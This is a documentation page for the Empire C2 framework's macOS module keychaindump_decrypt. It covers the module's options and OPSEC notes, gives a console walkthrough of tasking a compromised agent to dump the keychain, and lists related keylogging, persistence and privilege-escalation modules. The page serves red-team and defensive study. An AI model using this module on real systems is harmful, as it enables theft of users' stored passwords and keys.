Sandbox-Keychain-Dump - Empire Module
This page contains detailed information about how to use the python/collection/osx/keychaindump_decrypt Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Sandbox-Keychain-Dump
Module: python/collection/osx/keychaindump_decrypt
Source code:
empire/server/modules/python/collection/osx/keychaindump_decrypt.yaml
MITRE ATT&CK:
T1142
Language: Python
Needs admin: No
OPSEC safe: No
Background: No
The keychaindump_decrypt module uses Apple Security utility to dump the contents of the keychain. WARNING: Will prompt user for access to each key.On Newer versions of Sierra and High Sierra, this will also ask the user for their password for each key.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the keychaindump_decrypt module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the keychaindump_decrypt module:
Agent
Agent to execute module on.
Additional Module Options
This is a list of additional options that are supported by the keychaindump_decrypt module:
OutFile
File to output AppleScript to, otherwise displayed on the screen.
Keychaindump_decrypt Example Usage
Here's an example of how to use the keychaindump_decrypt module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/osx/ducky) > usemodule python/collection/osx/keychaindump_decrypt
Author @import-au
Background False
Description Uses Apple Security utility to dump the contents of the keychain.
WARNING: Will prompt user for access to each key.On Newer versions of
Sierra and High Sierra, this will also ask the user for their password
for each key.
Language python
Name python/collection/osx/keychaindump_decrypt
NeedsAdmin False
OpsecSafe False
Techniques http://attack.mitre.org/techniques/T1142
,Record Options---,----------,------------------------------------,
| Name | Value | Required | Description |
|---------|-------|----------|------------------------------------|
| Agent | | True | Agent to execute module on. |
|---------|-------|----------|------------------------------------|
| OutFile | | False | File to output AppleScript to, |
| | | | otherwise displayed on the screen. |
'---------'-------'----------'------------------------------------'
(Empire: usemodule/python/collection/osx/keychaindump_decrypt) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/python/collection/osx/keychaindump_decrypt) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Author
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/python/collection/osx/keychaindump_decrypt.yaml
- http://attack.mitre.org/techniques/T1142
See Also
Check also the following modules related to this module:
- python/collection/osx/keychaindump_chainbreaker
- python/collection/osx/osx_mic_record
- python/collection/osx/sniffer
- python/collection/osx/imessage_dump
- python/collection/osx/kerberosdump
- python/collection/osx/prompt
- python/collection/osx/hashdump
- python/collection/osx/browser_dump
- python/collection/osx/pillage_user
- python/collection/osx/webcam
- python/collection/osx/screenshot
- python/collection/osx/keychaindump
- python/collection/osx/search_email
- python/collection/osx/screensaver_alleyoop
- python/collection/osx/native_screenshot_mss
- python/collection/osx/clipboard
- python/collection/osx/keylogger
- python/collection/osx/native_screenshot
- python/trollsploit/osx/change_background
- python/trollsploit/osx/say
- python/trollsploit/osx/thunderstruck
- python/trollsploit/osx/login_message
- python/management/osx/shellcodeinject64
- python/management/osx/screen_sharing
- python/situational_awareness/host/osx/situational_awareness
- python/situational_awareness/host/osx/HijackScanner
- python/privesc/osx/piggyback
- python/privesc/osx/dyld_print_to_file
- python/persistence/osx/mail
- python/persistence/osx/LaunchAgent
- python/persistence/osx/loginhook
- python/persistence/osx/CreateHijacker
- python/persistence/osx/LaunchAgentUserLandPersistence
- python/persistence/osx/RemoveLaunchAgent
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.